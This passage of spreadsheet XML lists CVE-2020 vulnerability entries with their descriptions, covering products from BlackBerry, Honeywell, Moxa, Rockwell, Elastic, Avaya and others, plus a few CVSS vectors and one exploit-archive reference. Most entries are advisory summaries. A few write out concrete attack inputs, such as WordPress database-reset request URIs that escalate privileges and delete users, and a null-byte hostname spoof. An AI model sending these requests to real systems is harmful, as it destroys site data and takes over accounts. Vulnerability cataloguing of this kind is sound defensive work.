  <si>
    <t>CVE-2020-6931</t>
  </si>
  <si>
    <t>HP Print and Scan Doctor may potentially be vulnerable to local elevation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-6932</t>
  </si>
  <si>
    <t>An information disclosure and remote code execution vulnerability in the slinger web server of the BlackBerry QNX Software Development Platform versions 6.4.0 to 6.6.0 could allow an attacker to potentially read arbitrary files and run arbitrary executables in the context of the web server.</t>
  </si>
  <si>
    <t>CVE-2020-6933</t>
  </si>
  <si>
    <t>An improper input validation vulnerability in the UEM Core of BlackBerry UEM version(s) 12.13.0, 12.12.1a QF2 (and earlier), and 12.11.1 QF3 (and earlier) could allow an attacker to potentially cause a Denial of Service (DoS) of the UEM Core service.</t>
  </si>
  <si>
    <t>CVE-2020-6937</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability in MuleSoft Mule CE/EE 3.8.x, 3.9.x, and 4.x released before April 7, 2020, could allow remote attackers to submit data which can lead to resource exhaustion.</t>
  </si>
  <si>
    <t>CVE-2020-6938</t>
  </si>
  <si>
    <t>A sensitive information disclosure vulnerability in Tableau Server 10.5, 2018.x, 2019.x, 2020.x released before June 26, 2020, could allow access to sensitive information in log files.</t>
  </si>
  <si>
    <t>CVE-2020-6939</t>
  </si>
  <si>
    <t>Tableau Server installations configured with Site-Specific SAML that allows the APIs to be used by unauthenticated users. If exploited, this could allow a malicious user to configure Site-Specific SAML settings and could lead to account takeover for users of that site. Tableau Server versions affected on both Windows and Linux are: 2018.2 through 2018.2.27, 2018.3 through 2018.3.24, 2019.1 through 2019.1.22, 2019.2 through 2019.2.18, 2019.3 through 2019.3.14, 2019.4 through 2019.4.13, 2020.1 through 2020.1.10, 2020.2 through 2020.2.7, and 2020.3 through 2020.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-6948</t>
  </si>
  <si>
    <t>A remote code execution issue was discovered in HashBrown CMS through 1.3.3. Server/Entity/Deployer/GitDeployer.js has a Service.AppService.exec call that mishandles the URL, repository, username, and password.</t>
  </si>
  <si>
    <t>CVE-2020-6949</t>
  </si>
  <si>
    <t>A privilege escalation issue was discovered in the postUser function in HashBrown CMS through 1.3.3. An editor user can change the password hash of an admin user's account, or otherwise reconfigure that account.</t>
  </si>
  <si>
    <t>CVE-2020-6950</t>
  </si>
  <si>
    <t>Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.</t>
  </si>
  <si>
    <t>CVE-2020-6954</t>
  </si>
  <si>
    <t>An issue was discovered on Cayin SMP-PRO4 devices. A user can discover a saved password by viewing the URL after a Connection String Test. This password is shown in the webpass parameter of a media_folder.cgi?apply_mode=ping_server URI.</t>
  </si>
  <si>
    <t>CVE-2020-6955</t>
  </si>
  <si>
    <t>An issue was discovered on Cayin SMP-PRO4 devices. They allow image_preview.html?filename= reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-6956</t>
  </si>
  <si>
    <t>PCS DEXICON 3.4.1 allows XSS via the loginName parameter in login_action.jsp.</t>
  </si>
  <si>
    <t>CVE-2020-6958</t>
  </si>
  <si>
    <t>An XXE vulnerability in JnlpSupport in Yet Another Java Service Wrapper (YAJSW) 12.14, as used in NSA Ghidra and other products, allows attackers to exfiltrate data from remote hosts and potentially cause denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-6959</t>
  </si>
  <si>
    <t>The following versions of MAXPRO VMS and NVR, MAXPRO VMS:HNMSWVMS prior to Version VMS560 Build 595 T2-Patch, HNMSWVMSLT prior to Version VMS560 Build 595 T2-Patch, MAXPRO NVR: MAXPRO NVR XE prior to Version NVR 5.6 Build 595 T2-Patch, MAXPRO NVR SE prior to Version NVR 5.6 Build 595 T2-Patch, MAXPRO NVR PE prior to Version NVR 5.6 Build 595 T2-Patch, and MPNVRSWXX prior to Version NVR 5.6 Build 595 T2-Patch are vulnerable to an unsafe deserialization of untrusted data. An attacker may be able to remotely modify deserialized data without authentication using a specially crafted web request, resulting in remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-6960</t>
  </si>
  <si>
    <t>The following versions of MAXPRO VMS and NVR, MAXPRO VMS:HNMSWVMS prior to Version VMS560 Build 595 T2-Patch, HNMSWVMSLT prior to Version VMS560 Build 595 T2-Patch, MAXPRO NVR: MAXPRO NVR XE prior to Version NVR 5.6 Build 595 T2-Patch, MAXPRO NVR SE prior to Version NVR 5.6 Build 595 T2-Patch, MAXPRO NVR PE prior to Version NVR 5.6 Build 595 T2-Patch, and MPNVRSWXX prior to Version NVR 5.6 Build 595 T2-Patch contain an SQL injection vulnerability that could give an attacker remote unauthenticated access to the web user interface with administrator-level privileges.</t>
  </si>
  <si>
    <t>CVE-2020-6961</t>
  </si>
  <si>
    <t>In ApexPro Telemetry Server, Versions 4.2 and prior, CARESCAPE Telemetry Server v4.2 &amp; prior, Clinical Information Center (CIC) Versions 4.X and 5.X, CARESCAPE Telemetry Server Version 4.3, CARESCAPE Central Station (CSCS) Versions 1.X, a vulnerability exists in the affected products that could allow an attacker to obtain access to the SSH private key in configuration files.</t>
  </si>
  <si>
    <t>CVE-2020-6962</t>
  </si>
  <si>
    <t>In ApexPro Telemetry Server, Versions 4.2 and prior, CARESCAPE Telemetry Server v4.2 &amp; prior, Clinical Information Center (CIC) Versions 4.X and 5.X, CARESCAPE Telemetry Server Version 4.3, CARESCAPE Central Station (CSCS) Versions 1.X CARESCAPE Central Station (CSCS) Versions 2.X, B450 Version 2.X, B650 Version 1.X, B650 Version 2.X, B850 Version 1.X, B850 Version 2.X, an input validation vulnerability exists in the web-based system configuration utility that could allow an attacker to obtain arbitrary remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-6963</t>
  </si>
  <si>
    <t>In ApexPro Telemetry Server Versions 4.2 and prior, CARESCAPE Telemetry Server v4.2 &amp; prior, Clinical Information Center (CIC) Versions 4.X and 5.X, CARESCAPE Central Station (CSCS) Versions 1.X, the affected products utilized hard coded SMB credentials, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-6964</t>
  </si>
  <si>
    <t>In ApexPro Telemetry Server Versions 4.2 and prior, CARESCAPE Telemetry Server v4.2 &amp; prior, Clinical Information Center (CIC) Versions 4.X and 5.X, CARESCAPE Central Station (CSCS) Versions 1.X and CARESCAPE Central Station (CSCS) Versions 2.X, the integrated service for keyboard switching of the affected devices could allow attackers to obtain remote keyboard input access without authentication over the network.</t>
  </si>
  <si>
    <t>CVE-2020-6965</t>
  </si>
  <si>
    <t>In ApexPro Telemetry Server Versions 4.2 and prior, CARESCAPE Telemetry Server v4.2 &amp; prior, Clinical Information Center (CIC) Versions 4.X and 5.X, CARESCAPE Central Station (CSCS) Versions 1.X, B450 Version 2.X, B650 Version 1.X, B650 Version 2.X, B850 Version 1.X, B850 Version 2.X, a vulnerability in the software update mechanism allows an authenticated attacker to upload arbitrary files on the system through a crafted update package.</t>
  </si>
  <si>
    <t>CVE-2020-6966</t>
  </si>
  <si>
    <t>In ApexPro Telemetry Server Versions 4.2 and prior, CARESCAPE Telemetry Server v4.2 &amp; prior, Clinical Information Center (CIC) Versions 4.X and 5.X, CARESCAPE Central Station (CSCS) Versions 1.X, the affected products utilize a weak encryption scheme for remote desktop control, which may allow an attacker to obtain remote code execution of devices on the network.</t>
  </si>
  <si>
    <t>CVE-2020-6967</t>
  </si>
  <si>
    <t>In Rockwell Automation all versions of FactoryTalk Diagnostics software, a subsystem of the FactoryTalk Services Platform, FactoryTalk Diagnostics exposes a .NET Remoting endpoint via RNADiagnosticsSrv.exe at TCPtcp/8082, which can insecurely deserialize untrusted data.</t>
  </si>
  <si>
    <t>CVE-2020-6968</t>
  </si>
  <si>
    <t>Honeywell INNCOM INNControl 3 allows workstation users to escalate application user privileges through the modification of local configuration files.</t>
  </si>
  <si>
    <t>CVE-2020-6969</t>
  </si>
  <si>
    <t>It is possible to unmask credentials and other sensitive information on “unprotected” project files, which may allow an attacker to remotely access the C-More Touch Panels EA9 series: firmware versions prior to 6.53 and manipulate system configurations.</t>
  </si>
  <si>
    <t>CVE-2020-6970</t>
  </si>
  <si>
    <t>A Heap-based Buffer Overflow was found in Emerson OpenEnterprise SCADA Server 2.83 (if Modbus or ROC Interfaces have been installed and are in use) and all versions of OpenEnterprise 3.1 through 3.3.3, where a specially crafted script could execute code on the OpenEnterprise Server.</t>
  </si>
  <si>
    <t>CVE-2020-6971</t>
  </si>
  <si>
    <t>In Emerson ValveLink v12.0.264 to v13.4.118, a vulnerability in the ValveLink software may allow a local, unprivileged, trusted insider to escalate privileges due to insecure configuration parameters.</t>
  </si>
  <si>
    <t>CVE-2020-6972</t>
  </si>
  <si>
    <t>In Notifier Web Server (NWS) Version 3.50 and earlier, the Honeywell Fire Web Server’s authentication may be bypassed by a capture-replay attack from a web browser.</t>
  </si>
  <si>
    <t>CVE-2020-6973</t>
  </si>
  <si>
    <t>Digi International ConnectPort LTS 32 MEI, Firmware Version 1.4.3 (82002228_K 08/09/2018), bios Version 1.2. Multiple cross-site scripting vulnerabilities exist that could allow an attacker to cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-6974</t>
  </si>
  <si>
    <t>Honeywell Notifier Web Server (NWS) Version 3.50 is vulnerable to a path traversal attack, which allows an attacker to bypass access to restricted directories. Honeywell has released a firmware update to address the problem.</t>
  </si>
  <si>
    <t>CVE-2020-6975</t>
  </si>
  <si>
    <t>Digi International ConnectPort LTS 32 MEI, Firmware Version 1.4.3 (82002228_K 08/09/2018), bios Version 1.2. Successful exploitation of this vulnerability could allow an attacker to upload a malicious file to the application.</t>
  </si>
  <si>
    <t>CVE-2020-6976</t>
  </si>
  <si>
    <t>Delta Industrial Automation CNCSoft ScreenEditor, v1.00.96 and prior. An out-of-bounds read overflow can be exploited when a valid user opens a specially crafted, malicious input file due to the lack of validation.</t>
  </si>
  <si>
    <t>CVE-2020-6977</t>
  </si>
  <si>
    <t>A restricted desktop environment escape vulnerability exists in the Kiosk Mode functionality of affected devices. Specially crafted inputs can allow the user to escape the restricted environment, resulting in access to the underlying operating system. Affected devices include the following GE Ultrasound Products: Vivid products - all versions; LOGIQ - all versions not including LOGIQ 100 Pro; Voluson - all versions; Versana Essential - all versions; Invenia ABUS Scan station - all versions; Venue - all versions not including Venue 40 R1-3 and Venue 50 R4-5</t>
  </si>
  <si>
    <t>CVE-2020-6978</t>
  </si>
  <si>
    <t>In Honeywell WIN-PAK 4.7.2, Web and prior versions, the affected product is vulnerable due to the usage of old jQuery libraries.</t>
  </si>
  <si>
    <t>CVE-2020-6979</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, the affected products use a hard-coded cryptographic key, increasing the possibility that confidential data can be recovered.</t>
  </si>
  <si>
    <t>CVE-2020-6980</t>
  </si>
  <si>
    <t>Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, If Simple Mail Transfer Protocol (SMTP) account data is saved in RSLogix 500, a local attacker with access to a victim’s project may be able to gather SMTP server authentication data as it is written to the project file in cleartext.</t>
  </si>
  <si>
    <t>CVE-2020-6981</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, an attacker may gain access to the system without proper authentication.</t>
  </si>
  <si>
    <t>CVE-2020-6982</t>
  </si>
  <si>
    <t>In Honeywell WIN-PAK 4.7.2, Web and prior versions, the header injection vulnerability has been identified, which may allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-6983</t>
  </si>
  <si>
    <t>In Moxa PT-7528 series firmware, Version 4.0 or lower, and PT-7828 series firmware, Version 3.9 or lower, the affected products use a hard-coded cryptographic key, which increases the possibility that confidential data can be recovered.</t>
  </si>
  <si>
    <t>CVE-2020-6984</t>
  </si>
  <si>
    <t>Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, The cryptographic function utilized to protect the password in MicroLogix is discoverable.</t>
  </si>
  <si>
    <t>CVE-2020-6985</t>
  </si>
  <si>
    <t>In Moxa PT-7528 series firmware, Version 4.0 or lower, and PT-7828 series firmware, Version 3.9 or lower, these devices use a hard-coded service code for access to the console.</t>
  </si>
  <si>
    <t>CVE-2020-6986</t>
  </si>
  <si>
    <t>In all versions of Omron PLC CJ Series, an attacker can send a series of specific data packets within a short period, causing a service error on the PLC Ethernet module, which in turn causes a PLC service denied result.</t>
  </si>
  <si>
    <t>CVE-2020-6987</t>
  </si>
  <si>
    <t>In Moxa PT-7528 series firmware, Version 4.0 or lower, and PT-7828 series firmware, Version 3.9 or lower, the affected products use a weak cryptographic algorithm, which may allow confidential information to be disclosed.</t>
  </si>
  <si>
    <t>CVE-2020-6988</t>
  </si>
  <si>
    <t>Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, A remote, unauthenticated attacker can send a request from the RSLogix 500 software to the victim’s MicroLogix controller. The controller will then respond to the client with used password values to authenticate the user on the client-side. This method of authentication may allow an attacker to bypass authentication altogether, disclose sensitive information, or leak credentials.</t>
  </si>
  <si>
    <t>CVE-2020-6989</t>
  </si>
  <si>
    <t>In Moxa PT-7528 series firmware, Version 4.0 or lower, and PT-7828 series firmware, Version 3.9 or lower, a buffer overflow in the web server allows remote attackers to cause a denial-of-service condition or execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-6990</t>
  </si>
  <si>
    <t>Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A, all versions, MicroLogix 1100 Controller, all versions, RSLogix 500 Software v12.001 and prior, The cryptographic key utilized to help protect the account password is hard coded into the RSLogix 500 binary file. An attacker could identify cryptographic keys and use it for further cryptographic attacks that could ultimately lead to a remote attacker gaining unauthorized access to the controller.</t>
  </si>
  <si>
    <t>CVE-2020-6991</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, weak password requirements may allow an attacker to gain access using brute force.</t>
  </si>
  <si>
    <t>CVE-2020-6992</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability has been identified in the GE Digital CIMPLICITY HMI/SCADA product v10.0 and prior. If exploited, this vulnerability could allow an adversary to modify the system, leading to the arbitrary execution of code. This vulnerability is only exploitable if an attacker has access to an authenticated session. GE Digital CIMPLICITY v11.0, released January 2020, contains mitigation for this local privilege escalation vulnerability. GE Digital recommends all users upgrade to GE CIMPLICITY v11.0 or newer.</t>
  </si>
  <si>
    <t>CVE-2020-6993</t>
  </si>
  <si>
    <t>In Moxa PT-7528 series firmware, Version 4.0 or lower, and PT-7828 series firmware, Version 3.9 or lower, an attacker can gain access to sensitive information from the web service without authorization.</t>
  </si>
  <si>
    <t>CVE-2020-6994</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability was found in some devices of Hirschmann Automation and Control HiOS and HiSecOS. The vulnerability is due to improper parsing of URL arguments. An attacker could exploit this vulnerability by specially crafting HTTP requests to overflow an internal buffer. The following devices using HiOS Version 07.0.02 and lower are affected: RSP, RSPE, RSPS, RSPL, MSP, EES, EES, EESX, GRS, OS, RED. The following devices using HiSecOS Version 03.2.00 and lower are affected: EAGLE20/30.</t>
  </si>
  <si>
    <t>CVE-2020-6995</t>
  </si>
  <si>
    <t>In Moxa PT-7528 series firmware, Version 4.0 or lower, and PT-7828 series firmware, Version 3.9 or lower, the application utilizes weak password requirements, which may allow an attacker to gain unauthorized access.</t>
  </si>
  <si>
    <t>CVE-2020-6996</t>
  </si>
  <si>
    <t>Triangle MicroWorks DNP3 Outstation LibrariesDNP3 Outstation .NET Protocol components and DNP3 Outstation ANSI C source code libraries are affected:3.16.00 through 3.25.01. A specially crafted message may cause a stack-based buffer overflow. Authentication is not required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-6997</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, sensitive information is transmitted over some web applications in cleartext.</t>
  </si>
  <si>
    <t>CVE-2020-6998</t>
  </si>
  <si>
    <t>The connection establishment algorithm found in Rockwell Automation CompactLogix 5370 and ControlLogix 5570 versions 33 and prior does not sufficiently manage its control flow during execution, creating an infinite loop. This may allow an attacker to send specially crafted CIP packet requests to a controller, which may cause denial-of-service conditions in communications with other products.</t>
  </si>
  <si>
    <t>CVE-2020-6999</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, some of the parameters in the setting pages do not ensure text is the correct size for its buffer.</t>
  </si>
  <si>
    <t>CVE-2020-7000</t>
  </si>
  <si>
    <t>VISAM VBASE Editor version 11.5.0.2 and VBASE Web-Remote Module may allow an unauthenticated attacker to discover the cryptographic key from the web server and gain information about the login and the encryption/decryption mechanism, which may be exploited to bypass authentication of the HTML5 HMI web interface.</t>
  </si>
  <si>
    <t>CVE-2020-7001</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, the affected products use a weak cryptographic algorithm, which may allow confidential information to be disclosed.</t>
  </si>
  <si>
    <t>CVE-2020-7002</t>
  </si>
  <si>
    <t>Delta Industrial Automation CNCSoft ScreenEditor, v1.00.96 and prior. Multiple stack-based buffer overflows can be exploited when a valid user opens a specially crafted, malicious input file.</t>
  </si>
  <si>
    <t>CVE-2020-7003</t>
  </si>
  <si>
    <t>In Moxa ioLogik 2500 series firmware, Version 3.0 or lower, and IOxpress configuration utility, Version 2.3.0 or lower, sensitive information is transmitted over some web applications in clear text.</t>
  </si>
  <si>
    <t>CVE-2020-7004</t>
  </si>
  <si>
    <t>VISAM VBASE Editor version 11.5.0.2 and VBASE Web-Remote Module may allow weak or insecure permissions on the VBASE directory resulting in elevation of privileges or malicious effects on the system the next time a privileged user runs the application.</t>
  </si>
  <si>
    <t>CVE-2020-7005</t>
  </si>
  <si>
    <t>In Honeywell WIN-PAK 4.7.2, Web and prior versions, the affected product is vulnerable to a cross-site request forgery, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-7006</t>
  </si>
  <si>
    <t>Systech Corporation NDS-5000 Terminal Server, NDS/5008 (8 Port, RJ45), firmware Version 02D.30. Successful exploitation of this vulnerability could allow information disclosure, limit system availability, and may allow remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-7007</t>
  </si>
  <si>
    <t>In Moxa EDS-G516E Series firmware, Version 5.2 or lower, the attacker may execute arbitrary codes or target the device, causing it to go out of service.</t>
  </si>
  <si>
    <t>CVE-2020-7008</t>
  </si>
  <si>
    <t>VISAM VBASE Editor version 11.5.0.2 and VBASE Web-Remote Module may allow input passed in the URL that is not properly verified before use, which may allow an attacker to read arbitrary files from local resources.</t>
  </si>
  <si>
    <t>CVE-2020-7009</t>
  </si>
  <si>
    <t>Elasticsearch versions from 6.7.0 before 6.8.8 and 7.0.0 before 7.6.2 contain a privilege escalation flaw if an attacker is able to create API keys. An attacker who is able to generate an API key can perform a series of steps that result in an API key being generated with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-7010</t>
  </si>
  <si>
    <t>Elastic Cloud on Kubernetes (ECK) versions prior to 1.1.0 generate passwords using a weak random number generator. If an attacker is able to determine when the current Elastic Stack cluster was deployed they may be able to more easily brute force the Elasticsearch credentials generated by ECK.</t>
  </si>
  <si>
    <t>CVE-2020-7011</t>
  </si>
  <si>
    <t>Elastic App Search versions before 7.7.0 contain a cross site scripting (XSS) flaw when displaying document URLs in the Reference UI. If the Reference UI injects a URL into a result, that URL will be rendered by the web browser. If an attacker is able to control the contents of such a field, they could execute arbitrary JavaScript in the victimï¿½s web browser.</t>
  </si>
  <si>
    <t>CVE-2020-7012</t>
  </si>
  <si>
    <t>Kibana versions 6.7.0 to 6.8.8 and 7.0.0 to 7.6.2 contain a prototype pollution flaw in the Upgrade Assistant. An authenticated attacker with privileges to write to the Kibana index could insert data that would cause Kibana to execute arbitrary code. This could possibly lead to an attacker executing code with the permissions of the Kibana process on the host system.</t>
  </si>
  <si>
    <t>CVE-2020-7013</t>
  </si>
  <si>
    <t>Kibana versions before 6.8.9 and 7.7.0 contain a prototype pollution flaw in TSVB. An authenticated attacker with privileges to create TSVB visualizations could insert data that would cause Kibana to execute arbitrary code. This could possibly lead to an attacker executing code with the permissions of the Kibana process on the host system.</t>
  </si>
  <si>
    <t>CVE-2020-7014</t>
  </si>
  <si>
    <t>The fix for CVE-2020-7009 was found to be incomplete. Elasticsearch versions from 6.7.0 to 6.8.7 and 7.0.0 to 7.6.1 contain a privilege escalation flaw if an attacker is able to create API keys and also authentication tokens. An attacker who is able to generate an API key and an authentication token can perform a series of steps that result in an authentication token being generated with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-7015</t>
  </si>
  <si>
    <t>Kibana versions before 6.8.9 and 7.7.0 contains a stored XSS flaw in the TSVB visualization. An attacker who is able to edit or create a TSVB visualization could allow the attacker to obtain sensitive information from, or perform destructive actions, on behalf of Kibana users who edit the TSVB visualization.</t>
  </si>
  <si>
    <t>CVE-2020-7016</t>
  </si>
  <si>
    <t>Kibana versions before 6.8.11 and 7.8.1 contain a denial of service (DoS) flaw in Timelion. An attacker can construct a URL that when viewed by a Kibana user can lead to the Kibana process consuming large amounts of CPU and becoming unresponsive.</t>
  </si>
  <si>
    <t>CVE-2020-7017</t>
  </si>
  <si>
    <t>In Kibana versions before 6.8.11 and 7.8.1 the region map visualization in contains a stored XSS flaw. An attacker who is able to edit or create a region map visualization could obtain sensitive information or perform destructive actions on behalf of Kibana users who view the region map visualization.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-7018</t>
  </si>
  <si>
    <t>Elastic Enterprise Search before 7.9.0 contain a credential exposure flaw in the App Search interface. If a user is given the ï¿½developerï¿½ role, they will be able to view the administrator API credentials. These credentials could allow the developer user to conduct operations with the same permissions of the App Search administrator.</t>
  </si>
  <si>
    <t>CVE-2020-7019</t>
  </si>
  <si>
    <t>In Elasticsearch before 7.9.0 and 6.8.12 a field disclosure flaw was found when running a scrolling search with Field Level Security. If a user runs the same query another more privileged user recently ran, the scrolling search can leak fields that should be hidden. This could result in an attacker gaining additional permissions against a restricted index.</t>
  </si>
  <si>
    <t>CVE-2020-7020</t>
  </si>
  <si>
    <t>Elasticsearch versions before 6.8.13 and 7.9.2 contain a document disclosure flaw when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain complex queries. This could result in the search disclosing the existence of documents the attacker should not be able to view. This could result in an attacker gaining additional insight into potentially sensitive indices.</t>
  </si>
  <si>
    <t>CVE-2020-7021</t>
  </si>
  <si>
    <t>Elasticsearch versions before 7.10.0 and 6.8.14 have an information disclosure issue when audit logging and the emit_request_body option is enabled. The Elasticsearch audit log could contain sensitive information such as password hashes or authentication tokens. This could allow an Elasticsearch administrator to view these details.</t>
  </si>
  <si>
    <t>CVE-2020-7029</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the System Management Interface Web component of Avaya Aura Communication Manager and Avaya Aura Messaging. This vulnerability could allow an unauthenticated remote attacker to perform Web administration actions with the privileged level of the authenticated user. Affected versions of Communication Manager are 7.0.x, 7.1.x prior to 7.1.3.5 and 8.0.x. Affected versions of Messaging are 7.0.x, 7.1 and 7.1 SP1.</t>
  </si>
  <si>
    <t>CVE-2020-7030</t>
  </si>
  <si>
    <t>A sensitive information disclosure vulnerability was discovered in the web interface component of IP Office that may potentially allow a local user to gain unauthorized access to the component. Affected versions of IP Office include: 9.x, 10.0 through 10.1.0.7 and 11.0 though 11.0.4.3.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48581.txt</t>
  </si>
  <si>
    <t>Avaya IP Office 11 - Password Disclosure</t>
  </si>
  <si>
    <t>2020-06-12</t>
  </si>
  <si>
    <t>CVE-2020-7032</t>
  </si>
  <si>
    <t>An XML external entity (XXE) vulnerability in Avaya WebLM admin interface allows authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. Affected versions of Avaya WebLM include: 7.0 through 7.1.3.6 and 8.0 through 8.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-7033</t>
  </si>
  <si>
    <t>A Cross Site Scripting (XSS) Vulnerability on the Unified Portal Client (web client) used in Avaya Equinox Conferencing can allow an authenticated user to perform XSS attacks. The affected versions of Equinox Conferencing includes all 9.x versions before 9.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-7034</t>
  </si>
  <si>
    <t>A command injection vulnerability in Avaya Session Border Controller for Enterprise could allow an authenticated, remote attacker to send specially crafted messages and execute arbitrary commands with the affected system privileges. Affected versions of Avaya Session Border Controller for Enterprise include 7.x, 8.0 through 8.1.1.x</t>
  </si>
  <si>
    <t>CVE-2020-7035</t>
  </si>
  <si>
    <t>An XML External Entities (XXE)vulnerability in the web-based user interface of Avaya Aura Orchestration Designer could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The affected versions of Orchestration Designer includes all 7.x versions before 7.2.3.</t>
  </si>
  <si>
    <t>CVE-2020-7036</t>
  </si>
  <si>
    <t>An XML External Entities (XXE)vulnerability in Callback Assist could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The affected versions of Callback Assist includes all 4.0.x versions before 4.7.1.1 Patch 7.</t>
  </si>
  <si>
    <t>CVE-2020-7037</t>
  </si>
  <si>
    <t>An XML External Entities (XXE) vulnerability in Media Server component of Avaya Equinox Conferencing could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system or even potentially lead to a denial of service. The affected versions of Avaya Equinox Conferencing includes all 9.x versions before 9.1.11. Equinox Conferencing is now offered as Avaya Meetings Server.</t>
  </si>
  <si>
    <t>CVE-2020-7038</t>
  </si>
  <si>
    <t>A vulnerability was discovered in Management component of Avaya Equinox Conferencing that could potentially allow an unauthenticated, remote attacker to gain access to screen sharing and whiteboard sessions. The affected versions of Management component of Avaya Equinox Conferencing include all 3.x versions before 3.17. Avaya Equinox Conferencing is now offered as Avaya Meetings Server.</t>
  </si>
  <si>
    <t>CVE-2020-7039</t>
  </si>
  <si>
    <t>tcp_emu in tcp_subr.c in libslirp 4.1.0, as used in QEMU 4.2.0, mismanages memory, as demonstrated by IRC DCC commands in EMU_IRC. This can cause a heap-based buffer overflow or other out-of-bounds access which can lead to a DoS or potential execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-7040</t>
  </si>
  <si>
    <t>storeBackup.pl in storeBackup through 3.5 relies on the /tmp/storeBackup.lock pathname, which allows symlink attacks that possibly lead to privilege escalation. (Local users can also create a plain file named /tmp/storeBackup.lock to block use of storeBackup until an admin manually deletes that file.)</t>
  </si>
  <si>
    <t>CVE-2020-7041</t>
  </si>
  <si>
    <t>An issue was discovered in openfortivpn 1.11.0 when used with OpenSSL 1.0.2 or later. tunnel.c mishandles certificate validation because an X509_check_host negative error code is interpreted as a successful return value.</t>
  </si>
  <si>
    <t>CVE-2020-7042</t>
  </si>
  <si>
    <t>An issue was discovered in openfortivpn 1.11.0 when used with OpenSSL 1.0.2 or later. tunnel.c mishandles certificate validation because the hostname check operates on uninitialized memory. The outcome is that a valid certificate is never accepted (only a malformed certificate may be accepted).</t>
  </si>
  <si>
    <t>CVE-2020-7043</t>
  </si>
  <si>
    <t>An issue was discovered in openfortivpn 1.11.0 when used with OpenSSL before 1.0.2. tunnel.c mishandles certificate validation because hostname comparisons do not consider '\0' characters, as demonstrated by a good.example.com\x00evil.example.com attack.</t>
  </si>
  <si>
    <t>CVE-2020-7044</t>
  </si>
  <si>
    <t>In Wireshark 3.2.x before 3.2.1, the WASSP dissector could crash. This was addressed in epan/dissectors/packet-wassp.c by using &gt;= and &lt;= to resolve off-by-one errors.</t>
  </si>
  <si>
    <t>CVE-2020-7045</t>
  </si>
  <si>
    <t>In Wireshark 3.0.x before 3.0.8, the BT ATT dissector could crash. This was addressed in epan/dissectors/packet-btatt.c by validating opcodes.</t>
  </si>
  <si>
    <t>CVE-2020-7046</t>
  </si>
  <si>
    <t>lib-smtp in submission-login and lmtp in Dovecot 2.3.9 before 2.3.9.3 mishandles truncated UTF-8 data in command parameters, as demonstrated by the unauthenticated triggering of a submission-login infinite loop.</t>
  </si>
  <si>
    <t>CVE-2020-7047</t>
  </si>
  <si>
    <t>The WordPress plugin, WP Database Reset through 3.1, contains a flaw that gave any authenticated user, with minimal permissions, the ability (with a simple wp-admin/admin.php?db-reset-tables[]=users request) to escalate their privileges to administrator while dropping all other users from the table.</t>
  </si>
  <si>
    <t>CVE-2020-7048</t>
  </si>
  <si>
    <t>The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI.</t>
  </si>
  <si>
    <t>CVE-2020-7049</t>
  </si>
  <si>
    <t>Nozomi Networks OS before 19.0.4 allows /#/network?tab=network_node_list.html CSV Injection.</t>
  </si>
  <si>
    <t>CVE-2020-7050</t>
  </si>
  <si>
    <t>Codologic Codoforum through 4.8.4 allows a DOM-based XSS. While creating a new topic as a normal user, it is possible to add a poll that is automatically loaded in the DOM once the thread/topic is opened. Because session cookies lack the HttpOnly flag, it is possible to steal authentication cookies and take over accounts.</t>
  </si>
  <si>
    <t>CVE-2020-7051</t>
  </si>
  <si>
